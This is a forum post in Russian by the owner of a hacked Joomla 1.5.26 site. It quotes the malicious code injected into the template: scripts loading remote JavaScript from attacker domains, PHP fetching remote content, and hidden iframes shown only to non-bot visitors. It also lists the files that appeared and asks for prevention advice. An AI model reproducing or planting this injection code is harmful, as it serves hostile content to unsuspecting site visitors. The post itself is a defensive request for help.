Здравствуйте, уважаемые гуру Joomla CMS. Недавно мою Joomla 1.5.26 взломали, после чего на нем на главной странице появилось окно со ссылкой на wizard-traffstock.com в правом нижнем углу. Ссылка баннера:
http://chels.healthyattitude.info/?851380=wInX2N-S18DX34mGgdng0-X65fbd7tvG5vrj5vnw3_bH_e3R7vPG_8DBh8Pk4v76x9mB5PfhgtHa19POmd_C8f2E_f_R-sXV_MyC1vft2teZ3Pv5_PKD-uHRjd6Hxvzy_djthevC3_qA_vnj_IbO0sGF7Pfa38z5_f_m7M3w8t770OHT2tmCgu3u7v2AjPrwxtXA3Ifr8f7n18bk8ND59_WEmdqDgf3s0MbNh_H4jc3f0P31jeCC7Nj78IGG2ILO5tD20eWFwdzlhMLe8vHs1dqGxpnthsbbzcD8-tHa3eSB69bA-4f98MDG-vLW0eXh1u3wjYzY-dPbh4Ti3fji9fOE2YDO8P7n8cLm-4XH5fzhzczG8dDczMHBhMXwxMbC_9L91_jw2cXD4fnF7u7c7Obd59D58dgЗдравствуйте!
Код внесённый злоумниками в страницу шаблона index.php: <script type="text/javascript">
(function(w) {
var script = document.createElement('script');
var i = setInterval(function() {
if (typeof w.document.body !== 'undefined') {
script.src = '
http://chels.healthyattitude.info' + '/?729268=wInAxpLW2NvX393Qx4mFjYSEjQ';
w.document.body.appendChild(script);
clearInterval(i);
}
}, 200);
})(window);
</script>
<?php
$utstat=@file_get_contents("
http://goldfighters.com/utb.php?urlid=23306");
echo "$utstat";
?>
<?php
$utstat=@file_get_contents("
http://goldfighters.com/utb.php?urlid=23306");
echo "$utstat";
?>
<?php
if(!preg_match('/(yandex|google|bot)/i', getenv('HTTP_USER_AGENT'))) {
echo '<iframe src="http://c' . mt_rand(1000, 9999). '.effete596.rsadvert.ru/';
echo '?in=53851" width="468" height="60" style="position:absolute;left:-10000px;"></iframe>';
}
?>
<?php
if(!preg_match('/(yandex|google|bot)/i', getenv('HTTP_USER_AGENT'))) {
echo '<iframe src="http://c' . mt_rand(1000, 9999). '.gappy426.rsadvert.ru/';
echo '?in=53851" width="468" height="60" style="position:absolute;left:-10000px;"></iframe>';
}
?>
<script type="text/javascript">
(function(w) {
var script = document.createElement('script');
var i = setInterval(function() {
if (typeof w.document.body !== 'undefined') {
script.src = '
http://rit.ranking-it.info' + '/?893484=WBFYXgpOQENPR0VIXxEeHRQVHw';
w.document.body.appendChild(script);
clearInterval(i);
}
}, 200);
})(window);
</script>
Ответ техподдержки:
Сам скрипт был внесён в результате наличия уязвимости в коде Вашей CMS.
Обратитесь к разработчику сайта (или к официальной техподдержке CMS)
для поиска решения и устранения данной проблемы.
Были затронуты файлы, которые удалось восстановить из более ранней
резервной копии (за 03.01.2013)
Появились файлы:
htdocs/templates/beez/index.php
htdocs/administrator/components: com_jce
htdocs/administrator/language/en-GB: en-GB.com_jce.ini
htdocs/administrator/language/en-GB: en-GB.com_jce.menu.ini
htdocs/administrator/language/en-GB: en-GB.plg_editors_jce.ini
htdocs/administrator/modules: mod_jcefilebrowser
htdocs/components: com_jce
htdocs/language/en-GB: en-GB.com_jce.ini
htdocs/language/en-GB: en-GB.com_jce.xml
htdocs/media: JCE
htdocs/modules: 11
htdocs/modules: 12
htdocs/modules: qq
htdocs/modules: zz
htdocs/plugins/editors: JCE.php
htdocs/plugins/editors: JCE.xml
htdocs/templates/adnak2012/index.php
htdocs/templates/beez/index.php
htdocs/templates/ja_purity/index.php
htdocs/templates/rhuk_milkyway2/index.php
После у сайта мною были изменены префиксы БД с jos_ на neskazhy_ , удалены неиспользуемые модули. Теперь сайт работает нормально.
Как предотвратить дальнейшее возможное надругательство над сайтом?